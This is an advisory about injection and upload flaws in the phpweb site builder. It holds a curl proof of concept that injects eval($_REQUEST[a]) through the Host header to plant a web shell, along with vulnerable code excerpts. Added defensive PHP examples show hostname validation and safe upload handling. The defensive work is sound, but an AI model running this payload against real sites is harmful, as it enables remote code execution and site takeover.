phpweb site builder, latest version (injection, upload, shell write) - Vulnerability Warning - 黑吧安全网 (myhack58)

ID MYHACK58:62201336563
Type myhack58
Reporter Anonymous (佚名)
Modified 2013-01-04T00:00:00



The reason this one is of marginal use ("chicken rib"): exploitation relies on the install script regenerating the configuration file, and that is where the executable code gets written.

Drawback 1: the destructive effect is very large, because the configuration file that gets rewritten is the database connection file.

Drawback 2: any webmaster with basic security sense deletes the install directory.

Although of marginal use, it also has an advantage: it is affected neither by magic_quotes_gpc nor by the web server in use.


$siteurl = "http://".$_SERVER["HTTP_HOST"]."/"; //Not filtered

$filestr = fread(fopen($SysConfigFile, 'r'), 30000);

$filestr = str_replace(" ", "", $filestr);

// ... (code omitted on the page) ...

fwrite(fopen($ConFile, "w"), $filestr, 30000);

$_SERVER["HTTP_HOST"] is taken from the HOST field of the HTTP request header, so the client controls it, and it is not affected by magic_quotes_gpc ^_^

PoC:



curl --data "dbhost=localhost&dbname=phpweb&dbuser=root&dbpwd=root&tablepre=pwn&nextstep=3&command=gonext&alertmsg=&username=" --header "HOST:localhost\";eval($_REQUEST[a]);#"

Shell address: /

As with the earlier phpcms case, a remote database is required.
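The root cause above is that a request header is concatenated straight into PHP source that later gets written to disk and included. The following is an added example, not phpweb's installer code, showing the pattern a defender would use instead: validate the host against a strict hostname grammar (or prefer an admin-confirmed value), emit the value with var_export so it can only ever become a string literal, and write the file atomically. The function names (is_valid_host, resolve_site_host, render_config, write_config_file) and the $ConFile target are assumptions for this example.

```php
<?php
// Added example (not phpweb's code): regenerating a config file without
// letting request-controlled input become PHP source.
// Assumed names: is_valid_host(), resolve_site_host(), render_config(),
// write_config_file(); $conFile is the config path the installer rewrites.

// Strict hostname check: labels of letters, digits and hyphens joined by
// dots, with an optional numeric port. Quotes, semicolons, parentheses and
// the like can never pass.
function is_valid_host(string $host): bool
{
    if ($host === '' || strlen($host) > 255) {
        return false;
    }
    $re = '/^[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?'
        . '(\.[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?)*(:\d{1,5})?$/';
    return (bool) preg_match($re, $host);
}

// Prefer an installer-supplied, admin-confirmed host over the Host header;
// fall back to the header only if it passes the strict check.
function resolve_site_host(array $server, ?string $configuredHost): string
{
    if ($configuredHost !== null && is_valid_host($configuredHost)) {
        return $configuredHost;
    }
    $header = $server['HTTP_HOST'] ?? '';
    if (!is_valid_host($header)) {
        throw new RuntimeException('Refusing to write config: Host header is not a plain hostname');
    }
    return $header;
}

// Build the config source from a key/value map. var_export() renders every
// value as a PHP literal, so whatever the input, the output is data, not code.
function render_config(array $values): string
{
    $lines = ['<?php'];
    foreach ($values as $name => $value) {
        if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]*$/', $name)) {
            throw new InvalidArgumentException("bad config key: $name");
        }
        $lines[] = '$' . $name . ' = ' . var_export($value, true) . ';';
    }
    return implode("\n", $lines) . "\n";
}

// Write to a temp file and rename over the target, so a half-written config
// is never included by a concurrent request.
function write_config_file(string $conFile, string $contents): void
{
    $tmp = $conFile . '.tmp.' . getmypid();
    if (file_put_contents($tmp, $contents, LOCK_EX) === false) {
        throw new RuntimeException("cannot write $tmp");
    }
    if (!rename($tmp, $conFile)) {
        @unlink($tmp);
        throw new RuntimeException("cannot replace $conFile");
    }
}

// Constructed hostile Host header of the shape the advisory describes:
// the strict check rejects it before anything touches the filesystem.
$hostile = ['HTTP_HOST' => 'localhost";eval($_REQUEST[a]);#'];
try {
    resolve_site_host($hostile, null);
} catch (RuntimeException $e) {
    echo "rejected: " . $e->getMessage() . "\n";
}

// With a sane host the generated file holds a quoted string literal only.
$host = resolve_site_host(['HTTP_HOST' => 'www.example.com'], null);
$source = render_config(['siteurl' => 'http://' . $host . '/']);
echo $source;
write_config_file(__DIR__ . '/config.example.php', $source);
```

The stronger fix is to not derive the site URL from the Host header during installation at all: ask the administrator for it on the install form and validate that value. Either way, generating the file through var_export rather than string replacement removes the whole class of "config file becomes a shell" bugs, and deleting the install directory after setup closes the entry point the advisory relies on.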

Upload vulnerability (needs feedback):

Vulnerable file: /kedit/upload_cgi/upload.php

Many people know this one, but it is of marginal use: it can only be exploited under the IIS6 parsing flaw or with GPC turned off.

<?php

define("ROOTPATH", "../../");

// ... (code omitted on the page; $dt is assigned there) ...

if(!is_dir(ROOTPATH.$_POST['attachPath'].$dt)){
    @mkdir(ROOTPATH.$_POST['attachPath'].$dt, 0777);
}

//File to save the directory path
$save_path = ROOTPATH.$_POST['attachPath'].$dt.'/';

echo $save_path;

//File to save the directory URL
$save_url = '../../'.$_POST['attachPath'].$dt.'/';

//Define the allowed upload file extensions
$ext_arr = array('gif','jpg','png','bmp'); //limit suffix

//Maximum file size
$max_size = 1000000;

//Change directory permissions
@mkdir($save_path, 0777);

//File full path
$file_path = $save_path.$_POST['fileName']; //save file name

//File URL
$file_url = $save_url.$_POST['fileName'];
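In the excerpt above both the directory ($_POST['attachPath']) and the final file name ($_POST['fileName']) are taken from the request, so the extension allowlist in $ext_arr is the only thing standing between the client and an arbitrary path. The following is an added example, not kedit's or phpweb's code, showing how the same fields would be handled defensively: the subdirectory must come from a fixed allowlist, the extension check runs on the last extension only and in lower case, the server chooses the stored file name itself, and the resolved directory is checked to still lie under ROOTPATH. The function name safe_upload_target, the $allowedDirs list and the ROOTPATH value are assumptions for this example.

```php
<?php
// Added example (not kedit's or phpweb's code): validating an upload
// target before anything is written. Assumed: ROOTPATH points at a
// directory this script may write to; safe_upload_target() and
// $allowedDirs are names chosen for the example.

define('ROOTPATH', __DIR__ . '/uploads');

function safe_upload_target(string $attachPath, string $originalName,
                            array $allowedDirs, array $extArr): string
{
    // 1. The subdirectory is one of a fixed set, never a caller-supplied path.
    if (!in_array($attachPath, $allowedDirs, true)) {
        throw new RuntimeException('attachPath not in allowlist');
    }

    // 2. Allowlist the *last* extension only, lower-cased, so "a.PNG" passes
    //    and "a.php" does not.
    $ext = strtolower(pathinfo($originalName, PATHINFO_EXTENSION));
    if (!in_array($ext, $extArr, true)) {
        throw new RuntimeException('file extension not allowed');
    }

    // 3. Server-chosen file name: random hex plus the validated extension.
    //    Nothing from the client-supplied name (inner dots, semicolons,
    //    slashes, null bytes) survives into the path, which is what the
    //    IIS6 parsing and GPC-off conditions the advisory mentions rely on.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;

    // 4. Date-based subdirectory, created with conservative permissions.
    $dir = ROOTPATH . '/' . $attachPath . '/' . date('Ymd');
    if (!is_dir($dir) && !mkdir($dir, 0755, true)) {
        throw new RuntimeException('cannot create upload dir');
    }

    // 5. Containment check: the resolved directory must stay under ROOTPATH.
    $real = realpath($dir);
    $root = realpath(ROOTPATH);
    if ($real === false || $root === false
        || strncmp($real, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        throw new RuntimeException('upload dir escapes ROOTPATH');
    }
    return $real . '/' . $name;
}

// Constructed inputs mirroring the two POST fields the vulnerable script reads.
$extArr = ['gif', 'jpg', 'png', 'bmp'];
$allowedDirs = ['attached'];
$cases = [
    ['attached', 'photo.jpg'],        // accepted, stored under a random name
    ['attached', 'report.php.jpg'],   // accepted, inner ".php" does not reach the path
    ['../../', 'photo.jpg'],          // attachPath rejected
    ['attached', 'index.php'],        // extension rejected
];
foreach ($cases as [$dir, $file]) {
    try {
        echo "$dir / $file -> " . safe_upload_target($dir, $file, $allowedDirs, $extArr) . "\n";
    } catch (RuntimeException $e) {
        echo "$dir / $file -> rejected: " . $e->getMessage() . "\n";
    }
}
```

The returned path is what a hardened script would hand to move_uploaded_file(); the client never learns or chooses the on-disk name. The same idea applies to the $save_url echoed back to the browser: build it from the validated $attachPath and the generated name, not from the request.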
